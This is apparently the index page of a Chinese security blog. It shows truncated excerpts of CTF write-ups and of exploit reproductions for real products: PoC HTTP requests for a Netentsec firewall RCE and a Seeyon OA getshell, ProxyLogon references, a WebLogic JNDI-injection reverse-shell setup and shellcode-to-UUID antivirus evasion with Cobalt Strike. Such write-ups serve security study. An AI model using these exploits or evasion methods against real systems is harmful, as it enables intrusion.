c1ay's blog

c1ay's blog

信息安全原创技术博客

2021 n1ctf 复盘
2021 n1ctf 复盘signinweb题只做出了签到,哭了 源码: 12345678910111213141516171819<?php //flag is /flag$path=$_POST['path'];$time=(isset($_GET['time'])) ? urldecode(date(file_get_contents('php://input'))) : date("Y/m/d H:i:s");$name="/var/www/tmp/".time().rand().'.txt';$black="f|ht|ba|z|ro|;|,|=|c|g|da|_";$bl...
2021 L3HCTF 部分web wp
2021 L3HCTF 部分web wp团队最终排名第15,仅记录个人参与解出的题 bypassUploadServlet.java 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211...
2021 bilibili 1024挑战赛
2021 bilibili 1024挑战赛安全攻防第一题: 1024程序员节,大家一起和2233参与解密游戏吧~happy_1024_2233:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156 aes ecb,密文和密钥都给了,直接写脚本即可: 123456789101112131415161718192021import base64import binasciifrom Crypto.Cipher import AESclass AESCip...
php反序列化原生类
php反序列化原生类记录一下在ctf当中遇到的有关php反序列化原生类的利用 预定义异常类:例如Exception类__toString2021第二届全国电信和互联网行业职业技能竞赛-SimplePHP 源码如下: 12345678910111213141516171819202122232425262728293031323334353637383940<?php/** maybe you need get the contents in hint.php! Ohhhhh you don't know how to get it? Why don't you t...
通过2021 ByteCTF double sqli初探clickghouse sqli
通过2021 ByteCTF double sqli初探clickghouse sqli通过该题顺便学习了一波clickhouse注入根据数据库报错得知是clickhouse数据库: 1http://39.105.175.150:30001/?id=1' 官方文档:https://clickhouse.com/docs/zh/ SQL注入资料:https://blog.deteact.com/yandex-clickhouse-injection/ 从资料当中得到两点比较重要的:121、与某些 SQL 方言不同,ClickHouse 具有严格的类型。类型之间没有隐式转换。2、Click...
2021HW总结-网康NS-NGFW rce复现分析
流传的POC12345678910111213141516171819POST /directdata/direct/router HTTP/1.1Host: xxxConnection: closeCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x...
Microsoft Exchange RCE
参考文章 https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265 https://github.com/sirpedrotavares/Proxylogon-exploit/blob/main/exploit.py CVE-2021-26855 SSRF+CVE-2021–2...
shellcode-uuid免杀
参考文章RIFT: Analysing a Lazarus Shellcode Execution Method 生成uuid使用cobaltstrike生成python shellcodeAttacks->Packages->Payload Generator语言选择python(什么语言都可以),这里选择了生成x64的shellcode 用python将shellcode转为uuid,因为uuid.UUID(bytes_le=u)当中u的长度需要为16字节,所以需要将shellcode进行分组,每组16字节,不足的用\x00补位 12345678import uuids...
weblogic cve-2021-2109 jndi注入 远程代码执行复现
影响版本Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0 利用方式一:无回显利用-反弹shell1、工具github地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases vps上执行: 1java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反...
Seeyon-OA getshell漏洞复现和payload构造
最早流传的payload来自狼组知识库(谷歌快照) 漏洞概述:前台getshell 影响版本:致远OA <A8+ 通杀 漏洞利用payload: 123456789101112131415161718POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1Host: 127.0.0.1Connection: closeCache-Control: max-age=0Upgrade-Inse...
avatar
c1ay
Learning to be good at thinking, thinking, thinking.